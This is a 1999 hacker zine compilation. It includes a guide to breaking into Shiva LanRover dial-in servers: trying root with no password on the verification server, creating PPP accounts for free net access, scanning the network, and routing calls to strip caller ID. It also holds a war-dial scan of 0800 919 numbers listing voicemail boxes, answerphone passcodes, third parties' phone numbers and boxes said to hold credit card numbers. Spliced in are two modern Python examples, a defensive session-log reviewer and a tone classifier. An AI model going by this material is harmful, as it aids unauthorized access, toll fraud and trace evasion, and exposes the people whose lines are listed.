including RADIUS authentication, SecurID, TACACS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the RADIUS authentication server. In this case, the setup would look something
like this.


[RADIUS Authentication Server]   } The server contains a secured user
             |                     list, which is used to verify login
             |                     requests. The login is determined by
          [Router]                 whether the user can be verified by
           |    |                  the server.
           |    |                } The Shiva sends the login request to RADIUS.
      [Shiva System]             } Starting Radius Authentification... @ Userid:

Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the RADIUS server, a secondary Shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have logged into a system, but
the above setup has been implemented. For example, say you logged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security>. If
the verification server has been set up, there will be no users in the user
list; instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification server, or primary Shiva, just use the show config command. You
can then telnet from the Shiva you are on to the Shiva displayed in the
config file; you should then get the @ Userid: login screen again, so try root
no pass. If this does not work, it is possible to temporarily configure your
own server on the network, but this would mean other users will not be able
to login, so leave this alone. If you do manage to login to the server as
root, you have to set up your user account there, because that is where all
the Shivas on the network refer to in order to verify users; this way the
admin only has to maintain one user configuration file.

5. PPP

Once you have set up a user account with shell and PPP privileges, you can
begin exploring the network on which the Shiva is based. If the network
is net connected you can get free net access as well, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network or port scanner across the domain which the Shiva
is on. As on most networks, you are likely to come across a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers; in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to simultaneously dial out across the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. Using
the <connect all_ports> command will give you control over the system modems,
then you can dial out as if you were in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dial up to the system directly. The mistake people make when it comes to ANI,
or CLID, is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong*: the ANI service can be set up by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationally, so your originating CLID gets stripped at intra-LATA
boundaries on the PSTN. A technique which I don't wanna give out involves
trunk and carrier hopping. Well, that's about it for this file, hope you
enjoyed it. If you want more information on the Shiva LanRover system, just
check out shiva.com; they will have technical guides in PDF format, and you
can also download the Shiva software from their ftp site.
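
From the admin's side, the giveaways named above (a PPP session live at 4am,
traffic to an IRC port, a privileged account arriving over dial-in) are easy
to pick out of session accounting. The following is an added example, not
code from the original article or from Shiva; the record layout and sample
sessions are constructed for it, and the off-hours window, the IRC port range
and the privileged-account list are assumptions.

```python
"""Review dial-in/PPP session records for off-hours activity, IRC destinations
and privileged accounts. Record layout and sample data are constructed for
this example; a real remote-access server logs in its own format."""
from datetime import datetime, timedelta

# Constructed sample records: session id, user, local start time, duration in
# minutes, and one destination host:port seen during the session.
SESSIONS = [
    {"id": 1, "user": "jsmith", "start": "1999-04-12 09:15", "mins": 45,
     "dest": "mail.example.internal:25"},
    {"id": 2, "user": "guest",  "start": "1999-04-13 03:58", "mins": 120,
     "dest": "irc.ais.net:6667"},
    {"id": 3, "user": "root",   "start": "1999-04-13 22:30", "mins": 420,
     "dest": "fileserver.example.internal:139"},
    {"id": 4, "user": "mjones", "start": "1999-04-14 17:50", "mins": 30,
     "dest": "www.example.com:80"},
]

OFF_HOURS_START, OFF_HOURS_END = 0, 6   # assumed quiet window: 00:00-06:00 local
IRC_PORTS = set(range(6660, 6670))      # assumed IRC range; covers 6667 from the text
PRIVILEGED = {"root"}                   # assumed list of accounts never expected on dial-in


def touches_off_hours(start: datetime, minutes: int) -> bool:
    """True if any part of the session overlaps the off-hours window.

    A session that starts at 22:30 and lasts seven hours is still up at 4am,
    so the whole session is walked in one-hour steps instead of testing only
    the start time."""
    end = start + timedelta(minutes=minutes)
    t = start
    while t < end:
        if OFF_HOURS_START <= t.hour < OFF_HOURS_END:
            return True
        t += timedelta(hours=1)
    return OFF_HOURS_START <= end.hour < OFF_HOURS_END


def review(sessions):
    """Return {session id: [reasons]} for every session that deserves a look."""
    flagged = {}
    for s in sessions:
        reasons = []
        start = datetime.strptime(s["start"], "%Y-%m-%d %H:%M")
        host, _, port = s["dest"].rpartition(":")
        if touches_off_hours(start, s["mins"]):
            reasons.append("active during off-hours")
        if port.isdigit() and int(port) in IRC_PORTS:
            reasons.append(f"IRC destination {host}:{port}")
        if s["user"] in PRIVILEGED:
            reasons.append("privileged account over dial-in")
        if reasons:
            flagged[s["id"]] = reasons
    return flagged


if __name__ == "__main__":
    for sid, why in review(SESSIONS).items():
        print(f"session {sid}: {'; '.join(why)}")
```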

Shouts to the following:

[9x] substance phriend siezer vectorx statd
blotter knight network specialK microdot
katkiller xramlrak bosplaya deadsoul and
nino the 9x g1mp.

[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.

Bodie (the elite geezer who supplies all my internet
needs and is genrally the elitest bloke in the world)

[D4RKCYDE] downtime elf zomba force mortis
angel dohboy brakis alphavax
tonekilla bishopofhell sintax
digitalfokus mistress.




***********************************************
* hybrid_blue@hotmail.com | DSS: 0x5493F1307 *
* th0rn@coldmail.com | D-H: 0x8B314ED9 *
* hybrid@darkcyde.org | RSA: 0xA42A953D *
* th0rn@cyberspace.org | *
* www2.dope.org/9x | 1999-02-09 *
* www.darkcyde.8m.com | *
***********************************************


---(OOooOO)--------How to be 3l337--------------------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-



"well, secOnd by secOnd and minute by minute,
its like lOttO, yOu gOtta be in it tO win it"

this file is for all of you newbies/lamers that wanna be as eleet as
the people who keep calling you names on that newsgroup yes! it can be
done! just follow the simple steps below and you too will be able to
call people names and make yourself look good! what are you waiting
for? get reading!

step 1
+======+
first of all you need to go down to blockbuster video
and rent out Hackers and Wargames watch them both
about 5O times then you're ready for step 2

step 2
+======+
you really need a computer to be eleet so beg your father
to get one tell him you need it for homework thats it! now
you have a computer!

step 3
+======+
now you need to be able to access the internet so tell
daddy that all of your friends can look at teletubbie
websites and you feel left out

step 4
+======+
when daddy's gone out connect to the internet i know it's
very difficult but you have got that nice aol guide that
came free with it haven't you? thats it!

step 5
+======+
you can now search for hacking and phreaking with a search
engine choose the one with the funny name Yahoo! well done

step 6
+======+
go to all of the nice looking hacking and phreaking sites
read all of the writing and look at all of the pictures

step 7
+======+
to be truly eleet you need a (00l-@$$ nickname/handle
either think of one yourself or choose one from the
following list.
o zEr0 c00l
o cRa$h 0VeRiDe
o CeReAl KiLLeR
o aCiD BuRn
the above names [as if you didn't know!] are from
Hackers the film so they must be eleet.

step 8
+======+
get yourself an account with hotmail or yahoo mail and
use your new nickname so try to get something like this:
zEr0_c00l@hotmail.com

step 9
+======+
open up your news server and read all of the posts in
alt.ph.uk alt.26OO alt.26OO.phreakz and alt.phreaking

step 1O
+=======+
it's time for you to make your first post to a newsgroup
i suggest alt.ph.uk look through all of the posts until
you find one saying 'how do i get free calls' or 'does
red boxing still work?' reply to the group so everyone
can see how eleet you are write something like this:
'y0 laMEr! y0u arE s0 laMe i tHiNk i'M g0nNa pUkE,
wHy d0N't Y0u d0 s0mE reSeArCh bef0re y0u p0sT sHiT LikE
ThAt eVeR heArD oF a SEaRch eNgiNe? 0h yeAh teLL y0uR MuM
tHAt sHE 0wEs Me £1000000000000 f0r lAst niGHt l4m3r!'

step 11
+=======+
in case you don't already know all eleet people write funny
with 0's, 1's, 3's and 4's instead of letters. writing like
that shows that you are truly eleet, you may ask why i'm not
writing like that well to tell the truth i'm not eleet, i wish
i was but i'm not

step 12
+=======+
download mIRC and hang out in #phuk #2600-uk #evilhax0rs
#phreak #hacking #hackers and #2600 you should get to know
the regulars in the above channels and you will be able to
go in there anytime and chat about how eleet you are and don't
forget to call anyone you don't know lame and kick ban them
straight away and ALWAYS remember to flame all posts made in
alt.ph.uk it will make you look eleet and cool

step 13
+=======+
learn html and java and use your skills to build your
own webpage call it 'zEr0 c00l's eleet hax0r warez palace'
and have loads of hacking phreaking anarchy cracking virii
warez stuff on there that you took from someone else's site and
pretend you wrote it. post the address to alt.ph.uk and tell
them that if they don't visit it they are lAmE-aSs pieces of
shit

step 14
+=======+
now that you are well respected among other eleet people
you should join a hacking/phreaking group and hang out with
the eleet peeps if you can't find one or nobody will let you
join one start your own and call it 'eleet hax0r d00ds'

step 15
+=======+
hack into a big website and change the homepage to say 'zEr0
c00l w0z ere' and leave your e-mail address phone number and
your home address you will get caught arrested and put in prison
without trial this will make you look eleet to everyone else
and you will have achieved your aim! people will have little banners
on their webpages saying 'fReE zEr0 c00l!' well done! but by now you
will be way too eleet for this text file and will have deleted it
and sent me an e-mail telling me how lame i am
oh well...


---(OOooOO)--------BT tones and announcements---------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-


1. SCOPE
¯¯¯¯¯¯¯¯¯¯
This document describes the supervisory tones generated by the BT
network and gives general information about BT network announcements.
Tones and announcements encountered on the BT network can come from
other networks, and customer premises equipment and these are not
covered in this document.

2. NETWORK SUPERVISORY TONES
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
The supervisory tones that will be returned from the BT network are listed in
Table 1.

Table 1. Network Supervisory Tones

+===============================================================================================+
| Network Generated | Significance | Range of levels | Tone Composition| Cadence |
| Tone | | received at BT | (± 5% except | (± 10% except |
| | | network interface | where stated) | where stated) |
|===================|===================|====================|=================|================|
|Proceed Indication |Proceed to dial |0 dBm to - 27 dBm. |350 Hz |Both tones |
|(Dial Tone) |indication |Each tone separately|plus |continuous |
| | |3 dB lower |440 Hz | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Proceed |Proceed to dial |0 dBm to -27dBm. |350 Hz |350 Hz tone - |
|Indication |indication when |Each tone separately|plus |0.75 s ON. |
| |certain |3 dB lower |440 Hz |0.75 s OFF |
| |supplementary | | |plus |
| |services have been | | |440 Hz tone - |
| |invoked | | |continuous |
| | | | |or both tones |
| | | | |pulsed at the |
| | | | |above rate. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Number Busy Tone |Called Customer's |0 dBm to -37 dBm. |400 Hz |0.375 s ON. |
|(Engaged Tone) |line in use | | |0.375 s OFF. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Congestion Tone |Routeing equipment |-6 dBm to -43 dBm. |400 Hz |0.4 s ON. |
|(Path Engaged Tone)|is temporarily |0 dBm to -37 dBm. | |0.35 s OFF. |
| |unavailable | | |0.225 s ON. |
| | | | |0.525 s OFF. |
| | | | |Note: Shorter |
| | | | |tone is 6 dBm |
| | | | |higher than the |
| | | | |longer tone. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Congestion |Precedes some |0 dBm to -37 dBm. |400 Hz |400 Hz tone - |
|Tone |congestion | |1004 Hz |0.2 s |
| |announcements | | |1004 Hz tone - |
| | | | |0.3 s |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Connection Not |Call cannot be |0 dBm to -37 dBm. |400 Hz |Continuous |
|Admitted Indication|routed to requested| | | |
|(Number |number | | | |
|Unobtainable Tone) | | | | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Awaiting Answer |Implies that called|0 dBm to -37 dBm. |400 Hz + 450 Hz |0.4 s ON. |
|Indication |Customers line is | | |0.2 s OFF. |
|(Ringing Tone) |being rung | | |0.4 s ON. |
| | | | |2.0 s OFF. |
| | | | |or 0.35 s ON. |
| | | | |0.22 s OFF. |
| | | | |Then start at |
| | | | |any point in |
| | | | |0.4 s ON. |
| | | | |0.2 s OFF. |
| | | | |0.4 s ON. |
| | | | |2.0 s OFF. |
| | | | |Note: Cadence |
| | | | |does not |
| | | | |necessarily |
| | | | |coincide with |
| | | | |call arrival |
| | | | |indication |
| | | | |cadence |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Information|Precedes certain |0 dBm to -37 dBm. |950 Hz ± 50 Hz |Each frequency |
|Tone |announcements | |1400 Hz ± 50 Hz |is sent for 330 |
| | | |1800 Hz ± 50 Hz |ms ± 70 ms in |
| | | | |the order given |
| | | | |and with silent |
| | | | |periods of up to|
| | | | |30 ms between |
| | | | |adjacent signals|
|-------------------|-------------------|--------------------|-----------------|----------------|
|Call Waiting |Indicates a second |0 dBm to -37 dBm |400 Hz |0.1 ON |
|Indication |Incoming call | | |2 - 5 s OFF. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Call |Indicates a special|0 dBm to -37 dBm. |400 Hz |0.25 s ON. |
|Waiting Indication |second incoming | | |0.25 s OFF. |
| |call | | |0.25 s ON. |
| | | | |0.25 s OFF. |
| | | | |0.25 s ON. |
| | | | |5.0 s OFF. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Pay Tone |Indicates credit |0 dBm to -37 dBm. |400 Hz |0.125 s ON. |
|(Payphones) |expiry to payphone | | |0.125 s OFF. |
| |(and called) | | |Continues for |
| |customer | | |11 s to 13 s or |
| | | | |until money is |
| | | | |inserted into |
| | | | |the payphone |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Acknowledgement |Follows dialled |0 dBm to -37 dBm. |1600 Hz ± 50 Hz |0.5 s to 1.5 s |
|Tone |access code | | | |
| |(e.g.144) and | | | |
| |precedes automatic | | | |
| |voice prompt | | | |
| |instructions | | | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Confirmation Tone |Used in some |0 dBm to -37 dBm. |1400 Hz |20 s followed by|
| |exchanges in place | | |silence |
| |of an announcement | | | |
| |to indicate that an| | | |
| |interrogated | | | |
| |service is active | | | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Switching Tone |Used in some |0 dBm to -37 dBm. |400 Hz |0.2 s ON. |
| |exchanges in place | | |0.4 s OFF. |
| |of an announcement | | |2.0 s ON. |
| |to indicate that an| | |0.4 s OFF. |
| |interrogated | | | |
| |service is not | | | |
| |active | | | |
+===============================================================================================+
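
Table 1 is in effect a specification for recognising which tone a line is
returning. The classifier below is an added example (not from the original
text or from BT): it encodes the fixed-cadence rows of the table and matches
an observed frequency set and ON/OFF sequence against them using the table's
±5% frequency and ±10% cadence tolerances. Rows with variable or mixed
patterns (Special Proceed, Call Waiting, Special Information, Acknowledgement,
Confirmation) are left out because they need range handling this example does
not attempt.

```python
"""Classify a BT network supervisory tone from its frequencies and cadence,
using the fixed-cadence rows of Table 1. Added example; tolerances follow
the table (frequencies +/-5%, cadence +/-10%)."""

# (name, frequencies in Hz, cadence as (on_s, off_s) pairs; () = continuous)
TONES = [
    ("Dial Tone",                      {350, 440}, ()),
    ("Number Busy Tone",               {400},      ((0.375, 0.375),)),
    ("Congestion Tone",                {400},      ((0.4, 0.35), (0.225, 0.525))),
    ("Number Unobtainable Tone",       {400},      ()),
    ("Ringing Tone",                   {400, 450}, ((0.4, 0.2), (0.4, 2.0))),
    ("Special Call Waiting Indication", {400},     ((0.25, 0.25), (0.25, 0.25), (0.25, 5.0))),
    ("Pay Tone",                       {400},      ((0.125, 0.125),)),
    ("Switching Tone",                 {400},      ((0.2, 0.4), (2.0, 0.4))),
]
FREQ_TOL = 0.05   # "( 5% except where stated)" column of Table 1
TIME_TOL = 0.10   # "( 10% except where stated)" column of Table 1


def close(measured, nominal, tol):
    """True if measured lies within tol (a fraction) of nominal."""
    return abs(measured - nominal) <= tol * nominal


def freqs_match(measured, nominal):
    """Every nominal component must be present and nothing extra."""
    if len(measured) != len(nominal):
        return False
    return all(any(close(m, n, FREQ_TOL) for m in measured) for n in nominal)


def cadence_match(measured, nominal):
    """measured: list of (on, off) seconds as observed on the line, in order.

    The observation may begin at any point in the cycle (the Ringing Tone row
    says so explicitly), so every rotation of the nominal pattern is tried;
    at least one full cycle must have been observed for a match."""
    if not nominal:
        return not measured            # continuous tone: no cadence at all
    if len(measured) < len(nominal):
        return False
    for shift in range(len(nominal)):
        ok = True
        for i, (on, off) in enumerate(measured):
            n_on, n_off = nominal[(i + shift) % len(nominal)]
            if not (close(on, n_on, TIME_TOL) and close(off, n_off, TIME_TOL)):
                ok = False
                break
        if ok:
            return True
    return False


def classify(freqs, cadence):
    """Return the Table 1 name for the observed tone, or None if no row fits.
    Rows are tried in table order, so a short observation that fits more
    than one 400 Hz row (busy vs. the first congestion segment) reports the
    earlier row; observe at least one full cycle to disambiguate."""
    for name, nominal_freqs, nominal_cadence in TONES:
        if freqs_match(freqs, nominal_freqs) and cadence_match(cadence, nominal_cadence):
            return name
    return None


if __name__ == "__main__":
    # Constructed measurements, slightly off nominal as a real line would be.
    print(classify({352, 438}, []))                                    # Dial Tone
    print(classify({401}, [(0.38, 0.37), (0.37, 0.38)]))              # Number Busy Tone
    print(classify({400, 452}, [(0.4, 2.0), (0.4, 0.2), (0.4, 2.0)]))  # Ringing Tone
```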

3. NETWORK ANNOUNCEMENTS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
A variety of announcements may be returned to a user during call set-up
and clear down. Other announcements may be returned to the user during
set-up, operation and cancellation of supplementary services and
services other than basic access to the Public Switched Telephone
Network (PSTN) (e.g. Chargecard, 0345, 0800, 0898).
Some announcements will be preceded by Special Information Tone.

All announcements will have a mean level at the BT network interface in
the range -14 dBm to -28 dBm and will be repeated for between 1 and 5
cycles.


---(OOooOO)--------UK scan of O8OO 919----------------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-


"where ya gOnna run when ya can't mOve further?
781 redrum with the murder"

Key :

NA = No answer
B = Busy/engaged
M = Modem/carrier
VMS = Voice Mail System
V = Voice/Picked up
PBX = Private Branch eXchange

000 Answerphone p=1819
001 VMS
003 V
004 V
005 V
006 Answerphone p=??
007 V
010 English Meridian Mail 3333-3333
011 V when busy BT Call Minder p=????
015 V
018 V
021 V
022 V
023 English Meridian Mail
024 Company recording
029 Answerphone p=20
032 Answerphone p=??
036 Dead then "This number is temporarily out of order"
038 VMS box 4501 smi * to get in to the box
039 NA
040 V
042 NA
044 Strange answerphone p=?? responds to keypresses by beeping
045 NA
046 M - User Name Verification User Name:
048 NA
049 V "hello metro jamline"
051 NA
053 NA
054 Fax
056 NA
057 NA
058 Answerphone p=?? * cuts to the beep 0 replays the ogm
066 V
068 Answerphone p=??
070 General Accident put on hold crap music
073 M - No response
077 V
079 VMS
080 V
082 NA
083 M - No response
084 Recording "operator is busy" put on hold
086 "The number called has been changed to 0181 blah blah"
089 Fax
090 Answerphone p=?? Lampost repair line!
091 Fax
092 Answerphone p=2233
094 Recorded information on air pollution answerphone p=1122?
099 M - Garbage AT~*^ AT&
100 NA
102 NA
107 Answerphone p=1122
108 V
110 NA
111 M/F
114 M - Shiva Lanrover System @user id:
116 "This number has changed to 0702 1162518"
117 Answerphone p=112233
118 NA
119 "The number called has been changed to 01904 643355"
120 NA
121 NA
122 NA
124 NA
125 Answerphone press * for security code prompt p=??
126 Answerphone p=?? you get transferred after a few attempts
127 Answerphone p=?? plays a cool tune
128 B
129 V some bloke SHOUTS at you
130 Answerphone p=2233 end of tape?
131 NA
132 V
133 Weird recording!? "No information available 807 bye"
134 Answerphone press * for security code prompt p=??
136 V "HELLO!"
139 Shitty VMS i can't get a mailbox? prompt
140 NA
141 Recording "This service is currently unavailable"
142 V
143 Shit answerphone
145 V
146 Answerphone p=??
147 NA
148 V
149 NA
151 NA
152 M - Garbage
153 V
155 Company recording
157 M - Garbage
161 Fax
162 NA
164 NA
165 Fucked up answerphone
166 Answerphone p=??
168 V
171 NA
174 Answerphone for a mobile phone with the number 0402 663083
press * for a security code prompt 4 digits
175 NA
177 NSPCC recording maybe an answerphone there
179 NA
180 Answerphone p=??
182 NA
186 V
187 Forwarded to VMS 'Voice Connector'
188 Airtours crew delay line for Manchester
191 Put on hold, Shitehouse Family hold music
199 Answerphone p=??? three digit
201 Put on hold, no music!
202 V
203 B
204 M - Garbage 
205 Answerphone p=??
206 V
208 V
209 NA
210 NA
211 NA
212 Fax
214 Answerphone p=??
216 NA
220 NA
221 Answerphone p=??
222 English Meridian Mail direct to box 4502
224 V
225 M - Garbage +++
226 Answerphone p=??
227 NA
228 NA
230 NA
231 NA
233 V
236 Forwarded to a fax
240 NA
243 NA
244 English Meridian Mail direct to box 4504 same system as above
245 NA
248 Answerphone p=*? after pressing * it responds to keypresses
249 Answerphone p=*? same as above
250 NA
254 NA
255 NA
258 V
259 Answerphone p=?? messages will have cc#'s on them
260 NA
261 Orange answerphone can't get a passcode? prompt
262 NA
268 NA
269 Answerphone
270 Answerphone p=??
271 It says it's a voice mail system but it hangs up on keypresses
273 V "Hello, Jamline"
274 Answerphone p=??
275 GAP VMS AUDIX couldn't locate the boxes
277 Airtours crew delay line for London Gatwick
280 V Sounded like a mobile phone or payphone
283 NA
285 M - No response
286 M - No response
287 M - No response
288 English Meridian Mail direct to box 4505 same system as above
289 VMS box 1000
290 NA
291 M - No response
292 NA
293 B
294 NA
295 PABX Peoples Bank
296 V Peoples Bank
300 Answerphone p=??
301 Stolen Credit Card Report Centre English Meridian Mail they
must have disabled it coz you press # to stop recording but it
won't give you a mailbox? prompt
303 Answerphone p=??
305 NA
306 NA
307 NA
308 Answerphone p=3345? around 2345 area
309 NA
311 English Meridian Mail direct to box 4506 same system as above
312 Answerphone p=#? i think # gets you in
313 Answerphone p=1?11?
316 Fax
317 Answerphone p=??
320 Answerphone p=*? press * then it responds to keypresses
321 English Meridian Mail
322 Answerphone p=??
325 NA
326 Answerphone p=?? # does something
327 NA
328 Answerphone/VMS p=?? it hangs up if you press * or #
329 NA
330 VMS AUDIX 5 digit boxes
331 VMS AUDIX 5 digit boxes
332 Company recording
333 Answerphone p=??? * to get security code? prompt 3 digits
334 Fax
336 Weird recording loop "we can't recognize this mailbox number"
337 M - Enter Your User Name: quite a few attempts
338 NA
339 VMS AUDIX 5 digit boxes
340 NA
341 NA
342 BT Answerphone p=#?
343 V
347 "It has not been possible to connect your call"
353 Answerphone p=??
355 English Meridian Mail direct to box 4507 same system as above
356 Answerphone p=?? # does something
357 Answerphone p=?? * forwards you to somewhere?
359 Answerphone p=??
360 M - Garbage g~
361 M - Garbage *n~
362 V
365 NA
366 Airtours crew delay line for Bristol
367 Answerphone p=??
369 NA
370 V
371 PABX x100 x111 NA
372 NA
373 NA
377 NA
378 M - Call has been intercepted by Defender Security Sever ID:
381 NA
385 Answerphone p=?? cool tune
386 NA
390 V
391 Answerphone p=?? messages will have cc#'s on them
392 M - Garbage +++
394 Answerphone p=?? cool tune
395 V
396 Answerphone p=??
397 NA
398 Weird DTMF tones then answerphone p=??
399 V BT!
- All numbers between 400 and 499 emit a weird tone
501 NA
503 V
506 V
508 Forwarded to V
509 NA
511 Answerphone p=?? cool tune
514 Answerphone p=?? cool tune
516 NA
518 BT call minder
520 Answerphone p=?? cool tune
522 V
524 NA
526 NA
527 NA
528 NA
535 Recorded message
540 Answerphone p=??
543 NA
544 Airtours crew delay line for Belfast
546 Fax
548 M - Shiva Lanrover @ userid:
549 V
552 Answerphone p=22/33area
553 Answerphone p=??
554 V
555 Answerphone p=31/32/33
558 Call waiting then V
560 VMS press # infinite attempts but i couldn't find any boxes
561 Forwarded to a fax
562 Answerphone p=4455area
567 NA
568 English Meridian Mail direct to box 2254 00,50,51,53,55,56
570 Answerphone p=12?
572 Fax
575 M - Annex Command Line Interpreter - Annex Username:
576 V
582 NA
583 NA
584 Fax
585 Answerphone press # then it responds to keypresses
587 Answerphone press # for a security code? prompt 5 digits
588 VMS AUDIX 5 digit boxes
591 BT recorded message
592 NA
593 V 'student village'
595 AA shitty PABX
596 English Meridian Mail 4444 40 39 38 36 4794
597 NA
599 Fax
602 V
603 Freephone dating service
608 English Meridian Mail direct to box 445 444 443- 440- 446- 447-
610 V
611 Airtours crew delay line for Newcastle and Glasgow
613 Recording "We are currently updating the system"
614 M - No response
616 NA
618 B
619 Answerphone p=?? one digit?
621 Forwarded to an op who asks for your message <REAL voice mail>
622 NA
623 Recording "We are currently updating the system"
625 Answerphone p=??
627 BT Call Minder
628 NA
630 Answerphone p=?? sounded like it ran out of tape
631 Answerphone p=?? messages will have cc#'s on them
633 Freephone Dating Service
634 NA
635 VMS Phonemail box 322
636 NA
637 Answerphone p=??
639 Answerphone p=??
642 Answerphone press # responds to keypresses
643 Freephone dating service
644 M - No response
645 NA
646 NA
649 NA
651 NA
653 V
654 V woman asks if she can take your message
655 NA
657 Answerphone press * then it responds to keypresses
658 Recording "We're sorry an error has occurred"
659 Same as above
660 Saga PABX shit
661 NA
662 Answerphone p=??
663 V
667 BT call minder
668 Answerphone p=?? messages will have cc#'s on them
669 NA
670 V
672 B&Q answerphone p=0
675 Answerphone p=456area
677 Answerphone p=??
678 Company recording
679 PABX crappy job vacancy thing
681 Answerphone * to get security code prompt p=? one or two digits
684 NA
685 Answerphone p=?? * hangs up
689 NA
690 Answerphone p=16/17
692 NA
693 Recording "this service is being updated"
694 Freephone dating service
695 Same as above
696 VMS box 540 crappy system
699 NA
700 V
703 V
704 VMS AUDIX 4 digit boxes
705 Answerphone # for security code? prompt
708 NA
709 Answerphone * for security code
717 BT recording
719 NA
720 V
721 Answerphone for a vodaphone number 0467 764224 passcode 9999
722 Fax
723 NA
724 NA
728 VMS pretty shite
729 Answerphone p=??
730 "This is AT&T Communications, number not available"
733 Fax
735 NA
737 Answerphone * for security code prompt
738 NA
739 NA
740 NA
742 English Meridian Mail direct to box 6208
744 BT Call Minder
746 WEiRD beeps on pickup then nothing, conference loop? maybe
748 NA
749 Answerphone p=??
752 V
754 V
755 VMS AUDIX 5 digits boxes
756 NA
759 Answerphone p=??
760 Fax
761 V
762 V
763 NA
764 V
765 Answerphone p=??
766 Answerphone p=?? someone picked up?
768 V
771 V
774 Answerphone p=??
776 NA
780 V
781 Answerphone p=??
783 Answerphone p=10
787 M
788 NA
790 Company recording
792 VMS AUDIX
793 NA
794 Company recording
795 Company recording
796 Company recording
797 NA
799 Airtours crew delay line for East Midlands
800 Company recording
804 Answerphone p=??
805 Company recording
806 Company recording
808 NA
811 NA
812 NA
814 Company recording
815 NA
816 NA
817 V
818 NA
819 NA
821 "You are being forwarded to a vms but the user at extension
4888 does not subscribe to this service"
822 V
824 NA
825 PBX press 3 for an English Meridian Mail
828 Answerphone p=??
829 Company recording
830 NA
833 WEiRD beeped on pick up then nothing
835 NA
836 NA
838 NA
839 Company recording
842 NA
843 BT Helpdesk answerphone, press * for security code? prompt
845 V
847 V
849 Company recording
850 NA
851 VMS press # for mailbox? prompt
855 V "good morning jam line"
856 Answerphone
857 NA
859 Company recording
861 Royal Bank of Scotland answerphone * does something
863 NA
865 "The person you are calling is not accepting anonymous calls,
please redial without withholding your number"
866 Same as above
867 And again
868 And again
869 Answerphone p=??
872 Answerphone BAD quality recording, cool tune, * does something
874 NA
875 NA
876 Company recording
877 NA
878 "The person you are calling is temporarily unavailable, please
try later"
879 "The number called has been changed to 0171 9037001"
880 NA
882 BT recording "This service is not compatible with this call"
884 M
885 M
887 NA
888 Airtours crew delay line for Leeds, Bradford, Humberside,
Aberdeen, Bournemouth and Edinburgh
891 Forwarded to the 121 Voice Mail Service crap
892 VMS same system as above
895 V
897 NA
900 Company recording - very sad
902 NA
905 B
906 Company recording
907 NA
908 Answerphone p=??
912 M
913 VMS OCTEL Direct 3 digit boxes
914 NA
917 Answerphone p=??
919 Answerphone p=??
920 V
922 Answerphone p=??
923 V "Hello?"
924 M
925 NA
927 Answerphone p=??
928 Same as above
930 VMS AUDIX
933 NA
934 BT "Calls to this number are being diverted" V
935 Answerphone p=??
937 V indian bloke actually started singing "bud bud ding ding"
940 Answerphone p=?? * does something
941 Answerphone p=??
944 Recording "No information available 806 bye"
946 Company recording
947 M/f
949 NA
950 Answerphone p=??
956 NA
958 V
959 Answerphone p=??
960 NA
962 NA
963 BT Call Minder
965 NA
966 NA
968 V
969 V
971 NA
972 V
973 NA
974 NA
976 NA
978 Answerphone p=??
980 NA
981 Answerphone p=??
983 Answerphone p=?? messages will have cc #'s on
986 NA
987 VMS AUDIX 5 digits
989 Some crap recording about rewards
993 M
994 Answerphone p=?? sounds like Mystic Meg
996 NA
997 Answerphone p=??
998 NA

shoutz:
Bodie + Hybrid + Chimmy + Zomba + Downtime + All of the D4RKCYDE crew

____________________________________________
_/ __________ _______ _ ______ _____/
\ __\ / | \| _/ \ | __|_
| | / | \ | \ \____| \
|__| \_________/____|___/\________/_________/

"so, i've decided to take my work back underground,
to stop it falling into the wrong hands..."

force007@hotmail.com O8OO 919355 direct to vmb
iCQ 21O63199


---(OOooOO)--------Switching System Number 7-SS7------------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-



_________ _________ _________________________
/ | / | | |
/ __ | / __ ::: |
/ / | | / / | | |_______________ |
/ / |___| / / |___| / /
/ /____________ / /____________ / /
| :: | / /
|_____________ ||_____________ | / /
___ | | ___ | | / /
| |_________| || |_________| | / /
| :: | / |
|___________________/ |___________________/ /____________|

Switching System Number 7 (SS7)
A Guide to the SS7 Telephony Protocol. April 1999.
By Hybrid. (th0rn@coldmail.com) (hybrid_blue@hotmail.com)



Everyone is still talking about 5ESS, and 1AESS switch programming. Whatever
